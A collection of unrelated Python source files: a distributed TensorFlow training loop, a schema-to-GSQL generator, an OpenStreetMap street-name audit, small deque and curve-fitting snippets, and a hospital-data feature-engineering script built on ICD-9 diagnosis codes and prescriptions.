while True:
# Wait for a new request from manager.
size = input_queue.get()
idx = index_buffer[:size].copy()
# Create the appropriate input batch
batch = input_buffer[idx]
batch = batch.reshape(size * num_states, *state_shape)
# Predict from the network.
policy_batch, value_batch = sess.run([policy, value], {x: batch, training_phase: 0})
# At this stage, we're done with the input and index buffer. So the manager can place more inputs.
ready_event.set()
# Reshape and output results
policy_batch = policy_batch.reshape(size, num_states, num_moves)
value_batch = value_batch.reshape(size, num_states, 1)
policy_buffer[idx, :, :] = policy_batch[:, :, :]
value_buffer[idx, :, :] = value_batch[:, :, :]
# Signal to workers that their results are ready.
for worker in idx:
output_ready[worker].set()
class DistributedTrainingProcess(DistributedNetworkProcess):
def __init__(self, make_network: Callable[[], keras.Model],
session_config: tf.ConfigProto,
task_index: int,
cluster_spec: tf.train.ClusterSpec,
input_queue: Queue,
ready_event: Event,
training_buffer: np.ndarray,
policy_target_buffer: np.ndarray,
value_target_buffer: np.ndarray,
**kwargs):
super(DistributedTrainingProcess, self).__init__(make_network=make_network,
session_config=session_config,
task_index=task_index,
parameter_server=False,
cluster_spec=cluster_spec,
input_queue=input_queue,
ready_event=ready_event,
output_ready=None,
input_buffer=training_buffer,
index_buffer=None,
policy_buffer=policy_target_buffer,
value_buffer=value_target_buffer,
**kwargs)
self.training_buffer = training_buffer
self.policy_target_buffer = policy_target_buffer
self.value_target_buffer = value_target_buffer
# noinspection SpellCheckingInspection
def run(self):
self._limit_gpu(self.task_index)
server = tf.train.Server(self.cluster_spec, job_name="worker", task_index=self.task_index,
config=self.session_config)
self._initialize_network(training_network=True)
# Add hooks if necessary
hooks = None
chief_only_hooks = None
print(server.target)
with tf.train.MonitoredTrainingSession(master=server.target, is_chief=(self.task_index == 0),
hooks=hooks, chief_only_hooks=chief_only_hooks,
config=self.session_config,
checkpoint_dir=self.network_config.checkpoint_dir,
save_checkpoint_secs=None,
save_checkpoint_steps=self.network_config.checkpoint_steps,
save_summaries_steps=None, save_summaries_secs=None) as sess:
keras.backend.set_session(sess)
writer = None
if self.network_config.tensorboard_log:
writer = tf.summary.FileWriter(self.network_config.log_dir, graph=sess.graph)
input_queue = self.input_queue
ready_event = self.ready_event
training_buffer = self.training_buffer
policy_target_buffer = self.policy_target_buffer
value_target_buffer = self.value_target_buffer
batch_size = self.network_config.training_batch_size
ready_event.set()
while True:
command, size = input_queue.get()
if command == 1:
self.model.save_weights(size, True)
else:
train_data = training_buffer[:size]
policy_targets = policy_target_buffer[:size]
value_targets = value_target_buffer[:size]
num_batches = int(np.ceil(size / batch_size))
for batch in range(num_batches):
low_idx = batch * batch_size
high_idx = (batch + 1) * batch_size
run_list = [self.train_op, self.policy_loss, self.value_loss, self.global_step, self.summary_op]
feed_dict = {self.x: train_data[low_idx:high_idx],
self.policy_target: policy_targets[low_idx:high_idx],
self.value_target: value_targets[low_idx:high_idx],
self.training_phase: 1}
_, ploss, vloss, step, summaries = sess.run(run_list, feed_dict)
if self.network_config.tensorboard_log:
writer.add_summary(summaries, step)
ready_event.set()
|
import os
import json
# mappings from schema.json to GSQL
dtype_mappings = {
'long': 'INT',
'date': 'DATETIME',
'int': 'INT'
}
def convert_dtype(dt):
if dt in dtype_mappings:
return dtype_mappings[dt]
else:
raise ValueError('Invalid data type: {}'.format(dt))
if __name__ == '__main__':
schema_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'common', 'schema.json')
with open(schema_file, 'r') as f:
schema = json.loads(f.read())
vertices = []
edges = []
for node in schema['node_types']:
excluded_fields = set(node['foreign_keys']) if 'foreign_keys' in node else set()
data_defs = 'PRIMARY_ID {} {}'.format(
node['id'],
convert_dtype(node['data_types'][node['id']]) if node['id'] in node['data_types'] else 'STRING'
)
for field in node['cols']:
if field not in excluded_fields and field != node['id']:
data_defs += ', {} {}'.format(
field,
convert_dtype(node['data_types'][field]) if field in node['data_types'] else 'STRING'
)
gsql = 'CREATE VERTEX {} ({}) WITH primary_id_as_attribute="true"'.format(
node['name'].lower(),
data_defs
)
vertices.append(node['name'].lower())
print(gsql)
for rel in schema['relationships']:
gsql = 'CREATE DIRECTED EDGE {} (FROM {}, TO {})'.format(
rel['type'].lower(),
rel['start_node'].lower(),
rel['end_node'].lower()
)
edges.append(rel['type'].lower())
print(gsql)
print('CREATE GRAPH mag ({}, {})'.format(', '.join(vertices), ', '.join(edges)))
|
# coding: utf-8
# In[1]:
import xml.etree.cElementTree as ET
from collections import defaultdict
import re
import pprint
# In[2]:
osmfile = "san-jose.osm"
street_type_re = re.compile(r'\b\S+\.?$', re.IGNORECASE)
expected = ["Street", "Avenue", "Boulevard", "Drive", "Court", "Place", "Loop", "Circle", "Square", "Lane", "Road", "Trail", "Parkway", "Commons", "Way", "Terrace", "Highway","Expressway", "East", "West", "Bellomy", "Winchester", "Oro", "1","Esquela", "Bascom", "6", "Plaza","Walk","Portofino","Napoli","Paviso","Barcelona","Volante","Sorrento","Franklin","Real", "Julian", "Flores", "Saratoga", "0.1","7.1", "Presada", "Row", "Alley", "Alameda", "Seville", "Montaña", "Palamos", "Marino", "Oaks", "Luna", "Madrid", "Mall", "Hamilton", "81", "114", "Robles", "Hill"]
# In[3]:
#this mapping was created after several iterations of the audit function
mapping = { "St": "Street",
"St.": "Street",
"street":"Street",
"Rd": "Road",
"Rd.": "Road",
"Ave": "Avenue",
"ave": "Avenue",
"Hwy": "Highway",
"court": "Court",
"Sq": "Square",
"Blvd": "Boulevard",
"Boulvevard": "Boulevard",
"Blvd.": "Boulevard",
"Ln": "Lane",
"Dr": "Drive",
"Cir": "Circle",
"Ct" : "Court",
"Pkwy": "Parkway"
}
# In[8]:
def audit_street_type(street_types, street_name):
m = street_type_re.search(street_name)
if m:
street_type = m.group()
if street_type not in expected:
street_types[street_type].add(street_name)
def is_street_name(elem):
return (elem.attrib['k'] == "addr:street")
def audit(osmfile):
osm_file = open(osmfile, "r")
street_types = defaultdict(set)
for event, elem in ET.iterparse(osm_file, events=("start",)):
if elem.tag == "node" or elem.tag == "way":
for tag in elem.iter("tag"):
if is_street_name(tag):
if re.search(u'Montaña',tag.attrib['v']): #this line is added due to a unicode error with python 2. this line bypasses it when it comes across this street name
continue
else:
audit_street_type(street_types, tag.attrib['v'])
osm_file.close()
return street_types
def update_name(name, mapping):
m = street_type_re.search(name)
if m:
street_type = m.group()
if street_type not in expected:
name = re.sub(street_type_re, mapping[street_type], name)
return name
# In[9]:
st_types = audit(osmfile)
#print out updated names
for st_type, ways in st_types.iteritems():
for name in ways:
better_name = update_name(name, mapping)
print name, "=>", better_name
# In[ ]:
|
'''A Deque double-ended queue. It can be visualized similar to a hollow tube or pipe, which is
open at the both ends. Deques allows addition and removal of elements from either ends. It
will be more clear with examples:
'''
import collections
de = collections.deque('JAreina')
print ('deque:', de
)
print( 'Lenght :', len(de)
)
print ('left end:', de[0]
)
print( 'right end:', de[-1]
)
de.remove('a')
print( 'After removing:', de) |
import numpy as np
import matplotlib.pyplot as plt
peak_found = np.array([66.491, 92.886, 119.479, 139.362, 165.966, 192.643])
peak_real = np.array([-5.4823, -3.2473, -1.0132, 0.6624, 2.8967, 5.1338])
err = np.array([0.0008, 0.0008, 0.0010, 0.0007, 0.0007,0.0010])
p, cov = np.polyfit(peak_found,peak_real,deg=1,w=err, cov = True)
x =np.linspace(peak_found[0], peak_found[-1], 100)
fit = lambda x: np.polyval(p,x)
# print(fit(peak_found))
# print(np.sum(((fit(peak_found)-peak_real)**2))) |
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 2 19:24:21 2017
@author: 310223340
"""
import pandas as pd
import numpy as np
from data_profile import execute_sql, write_to_table
import NDC_Mapping_v4
#%% create master diagnosis frame
def master_icd9():
print("\nCreating MASTER_icd9...")
ALZHDMTA_icd9 = pd.DataFrame(['3310','3311','33111','33119','3312','3317','2900','2901','29010','29011','29012','29013','29020','29021','2903','29040','29041','29042','29043','2940','2941','29410','29411','2948','797'],columns=['ICD9'])
ALZHDMTA_icd9['Diagnosis'] = 'ALZHDMTA'
DIABETES_icd9 = pd.DataFrame(['24900', '24901', '24910', '24911', '24920', '24921', '24930', '24931', '24940', '24941', '24950', '24951', '24960', '24961', '24970', '24971', '24980', '24981', '24990', '24991', '25000', '25001', '25002', '25003', '25010', '25011', '25012', '25013', '25020', '25021', '25022', '25023', '25030', '25031', '25032', '25033', '25040', '25041', '25042', '25043', '25050', '25051', '25052', '25053', '25060', '25061', '25062', '25063', '25070', '25071', '25072', '25073', '25080', '25081', '25082', '25083', '25090', '25091', '25092', '25093', '3572', '36201', '36202', '36641'],columns=['ICD9'])
DIABETES_icd9['Diagnosis'] = 'DIABETES'
CHF_icd9 = pd.DataFrame(['39891','40201','40211','40291','40401','40411','40491','40403','40413','40493','4280','4281','42820','42821','42822','42823','42830','42831','42832','42833','42840','42841','42842','42843','4289'],columns=['ICD9'])
CHF_icd9['Diagnosis'] = 'CHF'
CHRNKIDN_icd9 = pd.DataFrame(['01600','01601','01602','01603','01604','01605','01606','0954','1890','1899','2230','23691','24940','24941','25040','25041','25042','25043','2714','2741','27410','28311','40301','40311','40391','40402','40403','40412','40413','40492','40493','4401','4421','5724','5800','5804','58081','58089','5809','5810','5811','5812','5813','58181','58189','5819','5820','5821','5822','5824','58281','58289','5829','5830','5831','5832','5834','5836','5837','58381','58389','5839','5845','5846','5847','5848','5849','585','5851','5852','5853','5854','5855','5856','5859','586','587','5880','5881','58881','58889','5889','591','75312','75313','75314','75315','75316','75317','75319','75320','75321','75322','75323','75329','7944'],columns=['ICD9'])
CHRNKIDN_icd9['Diagnosis'] = 'CHRNKIDN'
COPD_icd9 = pd.DataFrame(['4910', '4911', '49120', '49121', '49122', '4918', '4919', '4920', '4928', '4940', '4941', '496'],columns=['ICD9'])
COPD_icd9['Diagnosis'] = 'COPD'
DEPRESSN_icd9 = pd.DataFrame(['29620','29621','29622','29623','29624','29625','29626','29630','29631','29632','29633','29634','29635','29636','29650','29651','29652','29653','29654','29655','29656','29660','29661','29662','29663','29664','29665','29666','29689','2980','3004','3091','311'],columns=['ICD9'])
DEPRESSN_icd9['Diagnosis'] = 'DEPRESSN'
ISCHMCHT_icd9 = pd.DataFrame(['41000','41001','41002','41010','41011','41012','41020','41021','41022','41030','41031','41032','41040','41041','41042','41050','41051','41052','41060','41061','41062','41070','41071','41072','41080','41081','41082','41090','41091','41092','4110','4111','41181','41189','412','4130','4131','4139','41400','41401','41402','41403','41404','41405','41406','41407','41410','41411','41412','41419','4142','4143','4148','4149','Proc','0066','3601','3602','3603','3604','3605','3606','3607','3609','3610','3611','3612','3613','3614','3615','3616','3617','3619','362','3631','3632','HCPCS','33510','33511','33512','33513','33514','33515','33516','33517','33518','33519','33521','33522','33523','33533','33534','33535','33536','33542','33545','33548','92975','92977','92980','92982','92995','33140','33141'],columns=['ICD9'])
ISCHMCHT_icd9['Diagnosis'] = 'ISCHMCHT'
OSTEOPRS_icd9 = pd.DataFrame(['73300','73301','73302','73303','73309'],columns=['ICD9'])
OSTEOPRS_icd9['Diagnosis'] = 'OSTEOPRS'
RA_OA_icd9 = pd.DataFrame(['7140','7141','7142','71430','71431','71432','71433','71500','71504','71509','71510','71511','71512','71513','71514','71515','71516','71517','71518','71520','71521','71522','71523','71524','71525','71526','71527','71528','71530','71531','71532','71533','71534','71535','71536','71537','71538','71580','71589','71590','71598'],columns=['ICD9'])
RA_OA_icd9['Diagnosis'] = 'RA_OA'
STRKETIA_icd9 = pd.DataFrame(['430','431','43400','43401','43410','43411','43490','43491','4350','4351','4353','4358','4359','436','99702'],columns=['ICD9'])
STRKETIA_icd9['Diagnosis'] = 'STRKETIA'
CNCR_BRST_icd9 = pd.DataFrame(['1740','1741','1742','1743','1744','1745','1746','1748','1749','2330'],columns=['ICD9'])
CNCR_BRST_icd9['Diagnosis'] = 'CNCR_BRST'
CNCR_COLR_icd9 = pd.DataFrame(['1540','1541','1530','1531','1532','1533','1534','1535','1536','1537','1538','1539','2303','2304'],columns=['ICD9'])
CNCR_COLR_icd9['Diagnosis'] = 'CNCR_COLR'
CNCR_PROS_icd9 = pd.DataFrame(['185','2334'],columns=['ICD9'])
CNCR_PROS_icd9['Diagnosis'] = 'CNCR_PROS'
CNCR_LUNG_icd9 = pd.DataFrame(['1620','1622','1623','1624','1625','1628','1629','2312'],columns=['ICD9'])
CNCR_LUNG_icd9['Diagnosis'] = 'CNCR_LUNG'
# combine all dataframes into one
MASTER_icd9 = pd.concat([ALZHDMTA_icd9,CHF_icd9,CHRNKIDN_icd9,COPD_icd9,DEPRESSN_icd9,DIABETES_icd9,ISCHMCHT_icd9,OSTEOPRS_icd9,RA_OA_icd9,STRKETIA_icd9,CNCR_BRST_icd9,CNCR_COLR_icd9,CNCR_PROS_icd9,CNCR_LUNG_icd9], ignore_index=True)
MASTER_icd9 = MASTER_icd9[['Diagnosis', 'ICD9']]
return (MASTER_icd9)
#%% Function to create diagnosis summaries
def diagnosis_summary(diag_data, comorbidity, MASTER_icd9):
#The diagnosis related dataset
print("\n\tDiagnosis summary:",comorbidity)
codes = list(MASTER_icd9.loc[MASTER_icd9.Diagnosis==comorbidity,'ICD9'])
inpat_diag_only = diag_data.loc[diag_data.icd9_code.isin(codes),]
inpat_diag_only = pd.merge(inpat_diag_only, admission[['hadm_id','visit_year','admittime','dischtime']])
inpat_diag_only = inpat_diag_only.loc[inpat_diag_only.visit_year.isin([2008,2009,2010]),]
inpat_diag_only = inpat_diag_only.sort_values(['subject_id','admittime'])
#Date of first diagnosis#
inpat_first_date = inpat_diag_only.drop_duplicates(subset='subject_id',keep='first')
inpat_first_date = inpat_first_date[['subject_id', 'admittime']]
inpat_first_date.columns = ['subject_id', comorbidity+'_First_Diag']
#Diagnosis in 2008#
inpat_diag_08 = inpat_diag_only.loc[inpat_diag_only.visit_year==2008,]
inpat_diag_visit_08 = inpat_diag_08[['subject_id','hadm_id']].drop_duplicates()
inpat_diag_visit_08 = inpat_diag_visit_08.groupby('subject_id').agg({'hadm_id':'count'}).reset_index()
inpat_diag_visit_08.columns = ['subject_id', comorbidity+'_Visit_2008']
inpat_diag_cnt_08 = inpat_diag_08[['subject_id','icd9_code']]
inpat_diag_cnt_08 = inpat_diag_cnt_08.groupby('subject_id').agg({'icd9_code':'count'}).reset_index()
inpat_diag_cnt_08.columns = ['subject_id', comorbidity+'_Count_2008']
inpat_diag_08 = pd.merge(inpat_diag_visit_08,inpat_diag_cnt_08)
#Diagnosis in 2009#
inpat_diag_09 = inpat_diag_only.loc[inpat_diag_only.visit_year==2009,]
inpat_diag_visit_09 = inpat_diag_09[['subject_id','hadm_id']].drop_duplicates()
inpat_diag_visit_09 = inpat_diag_visit_09.groupby('subject_id').agg({'hadm_id':'count'}).reset_index()
inpat_diag_visit_09.columns = ['subject_id', comorbidity+'_Visit_2009']
inpat_diag_cnt_09 = inpat_diag_09[['subject_id','icd9_code']]
inpat_diag_cnt_09 = inpat_diag_cnt_09.groupby('subject_id').agg({'icd9_code':'count'}).reset_index()
inpat_diag_cnt_09.columns = ['subject_id', comorbidity+'_Count_2009']
inpat_diag_09 = pd.merge(inpat_diag_visit_09, inpat_diag_cnt_09)
#Diagnosis in 2010#
inpat_diag_10 = inpat_diag_only.loc[inpat_diag_only.visit_year==2010,]
inpat_diag_visit_10 = inpat_diag_10[['subject_id','hadm_id']].drop_duplicates()
inpat_diag_visit_10 = inpat_diag_visit_10.groupby('subject_id').agg({'hadm_id':'count'}).reset_index()
inpat_diag_visit_10.columns = ['subject_id', comorbidity+'_Visit_2010']
inpat_diag_cnt_10 = inpat_diag_10[['subject_id','icd9_code']]
inpat_diag_cnt_10 = inpat_diag_cnt_10.groupby('subject_id').agg({'icd9_code':'count'}).reset_index()
inpat_diag_cnt_10.columns = ['subject_id', comorbidity+'_Count_2010']
inpat_diag_10 = pd.merge(inpat_diag_visit_10,inpat_diag_cnt_10)
#Condition Era within 30,60,90,180 days ##
inpat_cera = inpat_diag_only[['subject_id','admittime','dischtime','visit_year']]
def cal_days_btwn_cond(group):
delta = abs(group.admittime - group.dischtime.shift(1))
return(pd.DataFrame(delta.dt.days))
inpat_cera['days_btwn_cond'] = inpat_cera.groupby(['subject_id','visit_year']).apply(cal_days_btwn_cond)
#dataframe to be used further for calculating mtbe
inpat_mtbe = inpat_cera.copy()
#condition era with persistence window of 30 days
inpat_cera['cera_30'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 30 else 1)
inpat_cera['cera_60'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 60 else 1)
inpat_cera['cera_90'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 90 else 1)
inpat_cera['cera_180'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 180 else 1)
#condition era based on years
inpat_cera = inpat_cera.groupby(['subject_id','visit_year']).agg({'cera_30':'sum', 'cera_60':'sum','cera_90':'sum', 'cera_180':'sum'}).reset_index()
inpat_cera.visit_year = comorbidity + '_' + inpat_cera.visit_year.astype(str)
inpat_cera = pd.pivot_table(inpat_cera, values=['cera_30','cera_60','cera_90','cera_180'], index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
colnames = ["_".join((j,i)) for i,j in inpat_cera.columns[1:]]
inpat_cera.columns = ['subject_id'] + colnames
#MTBE
inpat_mtbe = inpat_mtbe.groupby('subject_id').agg({'days_btwn_cond':'mean'}).reset_index()
inpat_mtbe.columns = ['subject_id', comorbidity+'_MTBE']
#Merging all computed datasets
inpat_diag_summary = inpat_first_date.merge(inpat_diag_08,on='subject_id',how='outer').merge(inpat_diag_09,on='subject_id',how='outer').merge(inpat_diag_10,on='subject_id',how='outer').merge(inpat_cera,on='subject_id',how='outer').merge(inpat_mtbe,on='subject_id',how='outer')
return(inpat_diag_summary)
#%% configuring the icd9 codes for matching (253.1->253.10, 493->493.00)
def configure_icd9_codes(df, col, new_col):
df[col] = df[col].apply(str)
df[new_col] = df[col]
for i, row in df.iterrows():
if '.' in row[new_col]:
str_pre_decimal = row[new_col].split('.')[0]
str_post_decimal = row[new_col].split('.')[1]
if len(str_post_decimal) == 1:
str_post_decimal = str_post_decimal + '0'
df.loc[i, new_col] = str_pre_decimal + '.' + str_post_decimal
else:
df.loc[i, new_col] = row[new_col] + '.00'
return(df)
#%% Function to create drug summaries
def drug_summary(pres_data, pres_name, adm_data, hcup_df):
print("\n###########################################################")
print("# Drug summary:",pres_name)
print("###########################################################")
drug_era = pres_data[['subject_id', 'hadm_id', 'starttime', 'endtime', 'ndc', 'drug', 'dose_val_rx', 'dose_unit_rx', 'drug_type']]
drug_era.columns = ['subject_id','hadm_id','drug_strt_orig','drug_end_orig','ndc','drug','dose_val_rx', 'dose_unit_rx', 'drug_type']
drug_era = drug_era.dropna(subset=['drug_strt_orig','drug_end_orig'])
drug_era.drug_strt_orig = pd.to_datetime(drug_era.drug_strt_orig, format='%Y-%m-%d')
drug_era.drug_end_orig = pd.to_datetime(drug_era.drug_end_orig, format='%Y-%m-%d')
drug_era = drug_era.sort_values(['drug_strt_orig', 'drug_end_orig']).reset_index(drop=True)
drug_era = pd.merge(drug_era, adm_data, on=['subject_id','hadm_id'])
# check for reversed start & end date, and make changes if required
for i, row in drug_era.iterrows():
if row.drug_strt_orig > row.drug_end_orig:
drug_era.loc[i,'drug_strt_trns'] = row.drug_end_orig
drug_era.loc[i,'drug_end_trns'] = row.drug_strt_orig
else:
drug_era.loc[i,'drug_strt_trns'] = row.drug_strt_orig
drug_era.loc[i,'drug_end_trns'] = row.drug_end_orig
drug_era['drug_days_supply'] = (drug_era.drug_end_trns - drug_era.drug_strt_trns).dt.days + 1
drug_era['days_drug_strt_orig_admittime_orig'] = (drug_era.drug_strt_trns - drug_era.admittime_orig).dt.days
drug_era['shftd_drug_days_supply'] = drug_era.drug_days_supply * drug_era.orig_adm_compression.astype(float)
drug_era['shftd_days_drug_strt_orig_admittime_orig'] = drug_era.days_drug_strt_orig_admittime_orig * drug_era.orig_adm_compression.astype(float)
drug_era['drug_strt_shftd'] = drug_era.admittime + drug_era.shftd_days_drug_strt_orig_admittime_orig.apply(lambda x: pd.Timedelta(days=round(x,0)))
drug_era['drug_end_shftd'] = drug_era.drug_strt_shftd + drug_era.shftd_drug_days_supply.apply(lambda x: pd.Timedelta(days=round(x,0)))
# count of prescription
inpat_drug_count = drug_era.groupby(['subject_id','visit_year']).agg({'drug':'count'}).reset_index()
inpat_drug_count.visit_year = pres_name + '_' + inpat_drug_count.visit_year.astype(str)
inpat_drug_count = pd.pivot_table(inpat_drug_count, values='drug', index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
# era calculation
inpat_dera = drug_era[['subject_id','drug_strt_shftd','drug_end_shftd','visit_year']]
inpat_dera = inpat_dera.sort_values(['subject_id','drug_strt_shftd','drug_end_shftd']).reset_index( drop=True)
#calculate days between prescriptions
def cal_days_btwn_pres(group):
delta = group.drug_strt_shftd - group.drug_end_shftd.shift(1)
return(pd.DataFrame(delta.dt.days))
inpat_dera['days_btwn_pres'] = inpat_dera.groupby(['subject_id','visit_year']).apply(cal_days_btwn_pres)
#drug era with perseistence window of 30 days
inpat_dera['dera_30'] = inpat_dera.days_btwn_pres.apply(lambda x: 0 if x <= 30 else 1)
inpat_dera['dera_60'] = inpat_dera.days_btwn_pres.apply(lambda x: 0 if x <= 60 else 1)
inpat_dera['dera_90'] = inpat_dera.days_btwn_pres.apply(lambda x: 0 if x <= 90 else 1)
#drug era based on years
inpat_dera = inpat_dera.groupby(['subject_id','visit_year']).agg({'dera_30':'sum', 'dera_60':'sum','dera_90':'sum'}).reset_index()
inpat_dera.visit_year = pres_name + '_' + inpat_dera.visit_year.astype(str)
inpat_dera = pd.pivot_table(inpat_dera, values=['dera_30','dera_60','dera_90'], index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
#flatten multiindex column names
colnames = ["_".join((j,i)) for i,j in inpat_dera.columns[1:]]
inpat_dera.columns = ['subject_id'] + colnames
inpat_dera = pd.merge(inpat_drug_count, inpat_dera, on='subject_id')
#find may treat & may prevent diagnosis
may_df_final = NDC_Mapping_v4.main(pres_data)
may_df_final = may_df_final.drop_duplicates()
#configure icd9 code for the match
may_df_final = configure_icd9_codes(may_df_final, 'may_icd9', 'icd9_to_compare')
#add hcup levels to the may_df_final data frame
may_df_final = pd.merge(may_df_final, hcup_df[['icd9_to_compare', 'hcup_label']], how='left', on='icd9_to_compare')
#exrtact the one's with no match & implement the following logic:
#1) If the Diagnoses code can not be found and is 3 digits:
#a) add "No HCUP mapping found - changed code to xxx00 (where xxx is the original code) to the output table for reference
#b) append a trailing 00 (2 zeros) to the end of the 3 digit code, and look for this code as before, If found continue mapping as defined
#
#2) If updated code (with 00 appended) is not found:
#a) Increment (00) to (01) and search for code. Update message defined in step 1a to reflect the change in the last 2 digits. If found, continue mapping as defined.
#b) If (01) not found, increment (01) to (02) and continue search and mapping
#c) continue steps a and b above until a match is found.
may_df_final_na = may_df_final[may_df_final['hcup_label'].isnull()]
if len(may_df_final_na) > 0:
for i, row in may_df_final_na.iterrows():
if ('.' not in row['may_icd9']) & (row['may_icd9'].str.len==3):
for i in range(100):
row['icd9_to_compare'] = row['may_icd9'] + '.' + str(i).zfill(2)
hcup_temp = hcup_df.loc[hcup_df['icd9_to_compare']==row['icd9_to_compare'],]
if len(hcup_temp)>0:
may_df_final_na[i, 'hcup_label'] = hcup_temp['hcup_label']
break
# merge with the main may_df_final
may_df_final_na = may_df_final_na.dropna(subset=['hcup_label'])
may_df_final = pd.concat([may_df_final, may_df_final_na], ignore_index=True)
#match with each patient's ndc
may_df_subject = pd.merge(pres_data[['subject_id', 'ndc']].drop_duplicates(), may_df_final, on='ndc')
may_df_subject = pd.pivot_table(may_df_subject, values='ndc', index='subject_id', columns='hcup_label',aggfunc=np.size,fill_value=0).reset_index()
colnames = list(pres_name + '_may_tp_' + may_df_subject.columns[1:].astype(str))
may_df_subject.columns = may_df_subject.columns[:1].tolist() + colnames
#merge with the drug era frame
inpat_dera = pd.merge(inpat_dera, may_df_subject, on='subject_id', how = 'left')
return(inpat_dera)
#%% feature creation from raw data
def feature_creation(admission, diagnosis, procedures, MASTER_icd9):
# Total number of comorbidities
print("\nFeature Creation: Total Comorbidities")
inpat_totcom = diagnosis.loc[diagnosis.hadm_id.isin(admission.hadm_id),['subject_id','hadm_id','seq_num']]
inpat_totcom = inpat_totcom.groupby(['subject_id','hadm_id']).agg({'seq_num':'max'}).reset_index()
inpat_totcom = inpat_totcom.groupby('subject_id').agg({'seq_num':'sum'}).reset_index().rename(columns={'seq_num':'TotalComorb'})
# For first visit ##
firstadm = admission.sort_values(['subject_id','dischtime']).reset_index(drop = True)
firstadm = firstadm.drop_duplicates(subset='subject_id',keep='first')
# Number of comorbidities in 1st visit
print("\nFeature Creation: Total Comorbidities in 1st visit")
inpat_com = diagnosis.loc[diagnosis.hadm_id.isin(firstadm.hadm_id),]
inpat_com = inpat_com.groupby('subject_id').agg({'seq_num':'max'}).reset_index().rename(columns={'seq_num':'ComorFirstVisit'})
# Total number of comorbidities in each year
print("\nFeature Creation: Total Comorbidities in each year")
inpat_totcom_yr = pd.merge(admission[['hadm_id','visit_year']],diagnosis,on='hadm_id')
inpat_totcom_yr = inpat_totcom_yr.groupby(['subject_id','hadm_id','visit_year']).agg({'seq_num':'max'}).reset_index()
inpat_totcom_yr = inpat_totcom_yr.groupby(['subject_id','visit_year']).agg({'seq_num':'sum'}).reset_index().rename(columns={'seq_num':'TotalComorb'})
inpat_totcom_yr = pd.pivot_table(inpat_totcom_yr, values='TotalComorb', index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
colnames = list('comorb_'+ inpat_totcom_yr.columns[1:].astype(str))
inpat_totcom_yr.columns = inpat_totcom_yr.columns[:1].tolist() + colnames
# Number of procedures in 1st visit
print("\nFeature Creation: Total Procedures in 1st visit")
inpat_proc = procedures.loc[procedures.hadm_id.isin(firstadm.hadm_id),]
inpat_proc = inpat_proc.groupby('subject_id').agg({'seq_num': 'max'}).reset_index().rename(columns={'seq_num': 'ProcsFirstVisit'})
# Total number of procedures
print("\nFeature Creation: Total Procedures")
inpat_totproc = procedures.loc[procedures.hadm_id.isin(admission.hadm_id),['subject_id','hadm_id','seq_num']]
inpat_totproc = inpat_totproc.groupby(['subject_id','hadm_id']).agg({'seq_num':'max'}).reset_index()
inpat_totproc = inpat_totproc.groupby('subject_id').agg({'seq_num':'sum'}).reset_index().rename(columns={'seq_num':'TotalProcs'})
# Total number of admissions in each year
print("\nFeature Creation: Total admissions in each year")
inpat_visit = admission.groupby(['subject_id','visit_year']).agg({'hadm_id':'count'}).reset_index()
inpat_visit = pd.pivot_table(inpat_visit, values='hadm_id', index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
colnames = list('TotalVisits_'+ inpat_visit.columns[1:].astype(str))
inpat_visit.columns = inpat_visit.columns[:1].tolist() + colnames
##compute the diagnosis summaries
print("\nFeature Creation: Diagosis summary per diagnosis")
inpat_diagnosis = pd.DataFrame(columns=['subject_id'])
for com in MASTER_icd9.Diagnosis.unique():
inpat_diagnosis_temp = diagnosis_summary(diagnosis,com,MASTER_icd9)
inpat_diagnosis = inpat_diagnosis.merge(inpat_diagnosis_temp,on='subject_id',how='outer')
## Length of stay
print("\nFeature Creation: Length of stay in each year")
admission['length_of_stay'] = (admission.dischtime - admission.admittime).dt.days + 1
inpat_los = admission.groupby(['subject_id','visit_year']).agg({'length_of_stay':'sum'}).reset_index()
inpat_los = pd.pivot_table(inpat_los, values='length_of_stay', index='subject_id', columns='visit_year', aggfunc=np.sum,fill_value=0).reset_index()
colnames = list('los_'+ inpat_los.columns[1:].astype(str))
inpat_los.columns = inpat_los.columns[:1].tolist() + colnames
## If there's a new ICD9 code in the last visit ##
print("\nFeature Creation: New diagnosis in last visit")
#keep patients with more than 1 visit
inpat_last = admission[['subject_id','hadm_id','admittime']].groupby('subject_id').filter(lambda x: len(x) > 1)
## For last visit ##
inpat_last = inpat_last.sort_values('admittime',ascending=False).reset_index(drop=True)
#last admission
inpat_last_adm = inpat_last.drop_duplicates(subset='subject_id',keep='first')
#all but last admission
inpat_all_but_last_adm = inpat_last.loc[~inpat_last.hadm_id.isin(inpat_last_adm.hadm_id),]
#last admission diagnosis
inpat_last_diag = diagnosis.loc[diagnosis.hadm_id.isin(inpat_last_adm.hadm_id),['subject_id','icd9_code']]
#all but last admission diagnosis
inpat_all_but_last_diag = diagnosis.loc[diagnosis.hadm_id.isin(inpat_all_but_last_adm.hadm_id),['subject_id','icd9_code']]
#define function to find new diagnosis in last visit
def new_diag_last_adm(subject_id):
last_diag = inpat_last_diag.loc[inpat_last_diag.subject_id==subject_id,]
all_but_last_diag = inpat_all_but_last_diag.loc[inpat_all_but_last_diag.subject_id==subject_id,]
last_new = pd.concat([last_diag,all_but_last_diag,all_but_last_diag]).drop_duplicates(keep=False)
return(last_new)
#call function for each patient
inpat_last_new = pd.DataFrame()
for subj in inpat_last_diag.subject_id.unique():
inpat_last_new_temp = new_diag_last_adm(subj)
inpat_last_new = pd.concat([inpat_last_new, inpat_last_new_temp])
#match ICD9 codes with the names, for unatched fill as OTHERS
inpat_last_new = pd.merge(inpat_last_new, MASTER_icd9, left_on='icd9_code', right_on='ICD9', how='left').fillna('OTHERS')
inpat_last_new = inpat_last_new.drop('ICD9',1)
#rename new diagnosis in last visit columns
inpat_last_new.Diagnosis = 'NewICD9LastVisit_' + inpat_last_new.Diagnosis
#pivot data in the required format
